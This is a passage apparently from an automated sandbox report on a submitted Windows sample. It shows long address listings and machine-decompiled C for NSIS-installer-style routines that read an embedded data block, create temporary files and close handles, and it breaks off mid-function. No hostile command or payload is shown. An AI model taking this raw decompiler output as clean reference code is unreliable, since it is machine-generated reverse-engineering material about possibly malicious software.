                            0x00406d97
                            0x00406d97
                            0x00406dac
                            0x00406daf
                            0x00406dcd
                            0x00406dcf
                            0x00000000
                            0x00406dcf
                            0x00406db1
                            0x00406db4
                            0x00406db7
                            0x00406dba
                            0x00406dbc
                            0x00406dbc
                            0x00406dbc
                            0x00406dbf
                            0x00406dc2
                            0x00406dc4
                            0x00406dc5
                            0x00406dc8
                            0x00000000
                            0x00000000
                            0x00406ffe
                            0x00407002
                            0x00407020
                            0x00407023
                            0x0040702a
                            0x0040702d
                            0x00407030
                            0x00407033
                            0x00407036
                            0x00407039
                            0x0040703b
                            0x00407042
                            0x00407043
                            0x00407045
                            0x00407048
                            0x0040704b
                            0x0040704e
                            0x0040704e
                            0x00407053
                            0x00000000
                            0x00407053
                            0x00407004
                            0x00407007
                            0x0040700a
                            0x00407014
                            0x00000000
                            0x00000000
                            0x00407068
                            0x0040706c
                            0x0040708f
                            0x00407092
                            0x00407095
                            0x0040709f
                            0x0040706e
                            0x0040706e
                            0x00407071
                            0x00407074
                            0x00407077
                            0x00407084
                            0x00407087
                            0x00407087
                            0x00000000
                            0x00000000
                            0x004070ab
                            0x004070af
                            0x00000000
                            0x00000000
                            0x004070b5
                            0x004070b9
                            0x00000000
                            0x00000000
                            0x004070bf
                            0x004070c1
                            0x004070c5
                            0x004070c5
                            0x004070c8
                            0x004070cc
                            0x00000000
                            0x00000000
                            0x0040711c
                            0x00407120
                            0x00407127
                            0x0040712a
                            0x0040712d
                            0x00407137
                            0x00000000
                            0x00407137
                            0x00407122
                            0x00000000
                            0x00000000
                            0x00407143
                            0x00407147
                            0x0040714e
                            0x00407151
                            0x00407154
                            0x00407149
                            0x00407149
                            0x00407149
                            0x00407157
                            0x0040715a
                            0x0040715d
                            0x0040715d
                            0x00407160
                            0x00407163
                            0x00407166
                            0x00407166
                            0x00407169
                            0x00407170
                            0x00407175
                            0x00000000
                            0x00000000
                            0x00407203
                            0x00407203
                            0x00407207
                            0x004075a5
                            0x00000000
                            0x004075a5
                            0x0040720d
                            0x00407210
                            0x00407213
                            0x00407217
                            0x0040721a
                            0x00407220
                            0x00407222
                            0x00407222
                            0x00407222
                            0x00407225
                            0x00407228
                            0x00000000
                            0x00000000
                            0x00406df8
                            0x00406df8
                            0x00406dfc
                            0x00407569
                            0x00000000
                            0x00407569
                            0x00406e02
                            0x00406e05
                            0x00406e08
                            0x00406e0c
                            0x00406e0f
                            0x00406e15
                            0x00406e17
                            0x00406e17
                            0x00406e17
                            0x00406e1a
                            0x00406e1d
                            0x00406e1d
                            0x00406e20
                            0x00406e23
                            0x00000000
                            0x00000000
                            0x00406e29
                            0x00406e2f
                            0x00000000
                            0x00000000
                            0x00406e35
                            0x00406e35
                            0x00406e39
                            0x00406e3c
                            0x00406e3f
                            0x00406e42
                            0x00406e45
                            0x00406e46
                            0x00406e49
                            0x00406e4b
                            0x00406e51
                            0x00406e54
                            0x00406e57
                            0x00406e5a
                            0x00406e5d
                            0x00406e60
                            0x00406e63
                            0x00406e7f
                            0x00406e82
                            0x00406e85
                            0x00406e88
                            0x00406e8f
                            0x00406e93
                            0x00406e95
                            0x00406e99
                            0x00406e65
                            0x00406e65
                            0x00406e69
                            0x00406e71
                            0x00406e76
                            0x00406e78
                            0x00406e7a
                            0x00406e7a
                            0x00406e9c
                            0x00406ea3
                            0x00406ea6
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eb1
                            0x00406eb1
                            0x00406eb5
                            0x00407575
                            0x00000000
                            0x00407575
                            0x00406ebb
                            0x00406ebe
                            0x00406ec1
                            0x00406ec5
                            0x00406ec8
                            0x00406ece
                            0x00406ed0
                            0x00406ed0
                            0x00406ed0
                            0x00406ed3
                            0x00406ed6
                            0x00406ed6
                            0x00406ed6
                            0x00406edc
                            0x00000000
                            0x00000000
                            0x00406ede
                            0x00406ee1
                            0x00406ee4
                            0x00406ee7
                            0x00406eea
                            0x00406eed
                            0x00406ef0
                            0x00406ef3
                            0x00406ef6
                            0x00406ef9
                            0x00406efc
                            0x00406f14
                            0x00406f17
                            0x00406f1a
                            0x00406f1d
                            0x00406f1d
                            0x00406f20
                            0x00406f24
                            0x00406f26
                            0x00406efe
                            0x00406efe
                            0x00406f06
                            0x00406f0b
                            0x00406f0d
                            0x00406f0f
                            0x00406f0f
                            0x00406f29
                            0x00406f30
                            0x00406f33
                            0x00000000
                            0x00406f35
                            0x00000000
                            0x00406f35
                            0x00406f33
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00000000
                            0x00000000
                            0x00406f75
                            0x00406f75
                            0x00406f79
                            0x00407581
                            0x00000000
                            0x00407581
                            0x00406f7f
                            0x00406f82
                            0x00406f85
                            0x00406f89
                            0x00406f8c
                            0x00406f92
                            0x00406f94
                            0x00406f94
                            0x00406f94
                            0x00406f97
                            0x00406f9a
                            0x00406f9a
                            0x00406fa0
                            0x00406f3e
                            0x00406f3e
                            0x00406f41
                            0x00000000
                            0x00406f41
                            0x00406fa2
                            0x00406fa2
                            0x00406fa5
                            0x00406fa8
                            0x00406fab
                            0x00406fae
                            0x00406fb1
                            0x00406fb4
                            0x00406fb7
                            0x00406fba
                            0x00406fbd
                            0x00406fc0
                            0x00406fd8
                            0x00406fdb
                            0x00406fde
                            0x00406fe1
                            0x00406fe1
                            0x00406fe4
                            0x00406fe8
                            0x00406fea
                            0x00406fc2
                            0x00406fc2
                            0x00406fca
                            0x00406fcf
                            0x00406fd1
                            0x00406fd3
                            0x00406fd3
                            0x00406fed
                            0x00406ff4
                            0x00406ff7
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00407286
                            0x00407286
                            0x0040728a
                            0x004075b1
                            0x00000000
                            0x004075b1
                            0x00407290
                            0x00407293
                            0x00407296
                            0x0040729a
                            0x0040729d
                            0x004072a3
                            0x004072a5
                            0x004072a5
                            0x004072a5
                            0x004072a8
                            0x00000000
                            0x00000000
                            0x00407056
                            0x00407056
                            0x00407059
                            0x00000000
                            0x00000000
                            0x00407395
                            0x00407399
                            0x004073bb
                            0x004073be
                            0x004073c8
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x0040739b
                            0x0040739e
                            0x004073a2
                            0x004073a5
                            0x004073a5
                            0x004073a8
                            0x00000000
                            0x00000000
                            0x00407452
                            0x00407456
                            0x00407474
                            0x00407474
                            0x00407474
                            0x0040747b
                            0x00407482
                            0x00407489
                            0x00407489
                            0x00000000
                            0x00407489
                            0x00407458
                            0x0040745b
                            0x0040745e
                            0x00407461
                            0x00407468
                            0x004073ac
                            0x004073ac
                            0x004073af
                            0x00000000
                            0x00000000
                            0x00407543
                            0x00407546
                            0x00000000
                            0x00000000
                            0x0040717d
                            0x0040717f
                            0x00407186
                            0x00407187
                            0x00407189
                            0x0040718c
                            0x00000000
                            0x00000000
                            0x00407194
                            0x00407197
                            0x0040719a
                            0x0040719c
                            0x0040719e
                            0x0040719e
                            0x0040719f
                            0x004071a2
                            0x004071a9
                            0x004071ac
                            0x004071ba
                            0x00000000
                            0x00000000
                            0x00407490
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x00000000
                            0x00000000
                            0x0040749f
                            0x0040749f
                            0x004074a3
                            0x004075db
                            0x00000000
                            0x004075db
                            0x004074a9
                            0x004074ac
                            0x004074af
                            0x004074b3
                            0x004074b6
                            0x004074bc
                            0x004074be
                            0x004074be
                            0x004074be
                            0x004074c1
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c7
                            0x004074c7
                            0x004074cb
                            0x0040752b
                            0x0040752e
                            0x00407533
                            0x00407534
                            0x00407536
                            0x00407538
                            0x0040753b
                            0x00407447
                            0x00407447
                            0x00000000
                            0x00407447
                            0x004074cd
                            0x004074d3
                            0x004074d6
                            0x004074d9
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074eb
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x0040750d
                            0x00407510
                            0x00407514
                            0x00407516
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074f8
                            0x004074fd
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x0040751d
                            0x00407524
                            0x00000000
                            0x00407526
                            0x00000000
                            0x00407526
                            0x00000000
                            0x004071c2
                            0x004071c5
                            0x004071fb
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732e
                            0x0040732e
                            0x00407331
                            0x00407333
                            0x004075bd
                            0x00000000
                            0x004075bd
                            0x00407339
                            0x0040733c
                            0x00000000
                            0x00000000
                            0x00407342
                            0x00407346
                            0x00407349
                            0x00407349
                            0x00407349
                            0x00000000
                            0x00407349
                            0x004071c7
                            0x004071c9
                            0x004071cb
                            0x004071cd
                            0x004071d0
                            0x004071d1
                            0x004071d3
                            0x004071d5
                            0x004071d8
                            0x004071db
                            0x004071f1
                            0x004071f6
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x0040725e
                            0x00407260
                            0x00407267
                            0x0040726a
                            0x0040726d
                            0x0040726d
                            0x00407272
                            0x00407272
                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x0040738e
                            0x004075c3
                            0x004075e5
                            0x004075eb
                            0x004075ed
                            0x004075f4
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x004075fa
                            0x004075fa
                            0x00000000

                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID: ndidateListW
                            • API String ID: 0-425658952
                            • Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                            • Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
                            • Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
                            • Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00403479 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 579 403479-4034a1 GetTickCount 580 4035d1-4035d9 call 40302e 579->580 581 4034a7-4034d2 call 4035f8 SetFilePointer 579->581 586 4035db-4035df 580->586 587 4034d7-4034e9 581->587 588 4034eb 587->588 589 4034ed-4034fb call 4035e2 587->589 588->589 592 403501-40350d 589->592 593 4035c3-4035c6 589->593 594 403513-403519 592->594 593->586 595 403544-403560 call 406bb0 594->595 596 40351b-403521 594->596 602 403562-40356a 595->602 603 4035cc 595->603 596->595 597 403523-403543 call 40302e 596->597 597->595 605 40356c-403574 call 40620a 602->605 606 40358d-403593 602->606 604 4035ce-4035cf 603->604 604->586 610 403579-40357b 605->610 606->603 607 403595-403597 606->607 607->603 609 403599-4035ac 607->609 609->587 611 4035b2-4035c1 SetFilePointer 609->611 612 4035c8-4035ca 610->612 613 40357d-403589 610->613 611->580 612->604 613->594 614 40358b 613->614 614->609
                            C-Code - Quality: 93%
                            			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40fb8e
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                            0x00403489
                            0x0040349c
                            0x004034a1
                            0x004035d1
                            0x004035d3
                            0x00000000
                            0x004035d9
                            0x004034ad
                            0x004034c0
                            0x004034c6
                            0x004034cc
                            0x004034d7
                            0x004034dc
                            0x004034e1
                            0x004034e9
                            0x004034eb
                            0x004034eb
                            0x004034f4
                            0x004034fb
                            0x00000000
                            0x00000000
                            0x00403501
                            0x00403507
                            0x0040350d
                            0x00000000
                            0x00403513
                            0x00403519
                            0x00403539
                            0x0040353e
                            0x00403543
                            0x00403549
                            0x0040354f
                            0x00403559
                            0x00403560
                            0x00000000
                            0x00000000
                            0x00403562
                            0x00403568
                            0x0040356a
                            0x0040358d
                            0x00403593
                            0x00000000
                            0x00000000
                            0x00403595
                            0x00403597
                            0x00000000
                            0x00000000
                            0x00403599
                            0x00403599
                            0x004035ac
                            0x00000000
                            0x00000000
                            0x004035bb
                            0x00000000
                            0x004035bb
                            0x00403574
                            0x0040357b
                            0x004035c8
                            0x004035ce
                            0x004035ce
                            0x00000000
                            0x004035ce
                            0x0040357d
                            0x00403583
                            0x00403589
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004035cc
                            0x004035cc
                            0x00000000
                            0x004035cc
                            0x00000000

                            APIs
                            • GetTickCount.KERNEL32 ref: 0040348D
                              • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                            • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: FilePointer$CountTick
                            • String ID: ndidateListW
                            • API String ID: 1092082344-425658952
                            • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                            • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                            • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                            • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 615 406187-406193 616 406194-4061c8 GetTickCount GetTempFileNameW 615->616 617 4061d7-4061d9 616->617 618 4061ca-4061cc 616->618 620 4061d1-4061d4 617->620 618->616 619 4061ce 618->619 619->620
                            C-Code - Quality: 100%
                            			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                            0x0040618d
                            0x00406193
                            0x00406194
                            0x00406194
                            0x00406199
                            0x0040619a
                            0x0040619d
                            0x004061a2
                            0x004061a5
                            0x004061af
                            0x004061bc
                            0x004061c0
                            0x004061c8
                            0x00000000
                            0x00000000
                            0x004061cc
                            0x00000000
                            0x004061ce
                            0x004061ce
                            0x004061ce
                            0x004061d1
                            0x004061d4
                            0x004061d4
                            0x004061d7
                            0x00000000

                            APIs
                            • GetTickCount.KERNEL32 ref: 004061A5
                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CountFileNameTempTick
                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                            • API String ID: 1716503409-44229769
                            • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                            • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                            • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                            • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 621 403c25-403c34 622 403c40-403c48 621->622 623 403c36-403c39 CloseHandle 621->623 624 403c54-403c60 call 403c82 call 405d74 622->624 625 403c4a-403c4d CloseHandle 622->625 623->622 629 403c65-403c66 624->629 625->624
                            C-Code - Quality: 100%
                            			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\alfons\\AppData\\Local\\Temp\\nsjD2C5.tmp\\", 7); // executed
				return _t4;
			}







                            0x00403c25
                            0x00403c34
                            0x00403c37
                            0x00403c39
                            0x00403c39
                            0x00403c40
                            0x00403c48
                            0x00403c4b
                            0x00403c4d
                            0x00403c4d
                            0x00403c4d
                            0x00403c54
                            0x00403c60
                            0x00403c66

                            APIs
                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                            Strings
                            • C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\, xrefs: 00403C5B
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CloseHandle
                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsjD2C5.tmp\
                            • API String ID: 2962429428-3044992453
                            • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                            • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                            • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                            • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 713 40603f-40605a call 406668 call 405fe2 718 406060-40606d call 4068ef 713->718 719 40605c-40605e 713->719 723 40607d-406081 718->723 724 40606f-406075 718->724 720 4060b8-4060ba 719->720 726 406097-4060a0 lstrlenW 723->726 724->719 725 406077-40607b 724->725 725->719 725->723 727 4060a2-4060b6 call 405f37 GetFileAttributesW 726->727 728 406083-40608a call 40699e 726->728 727->720 733 406091-406092 call 405f83 728->733 734 40608c-40608f 728->734 733->726 734->719 734->733
                            C-Code - Quality: 53%
                            			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
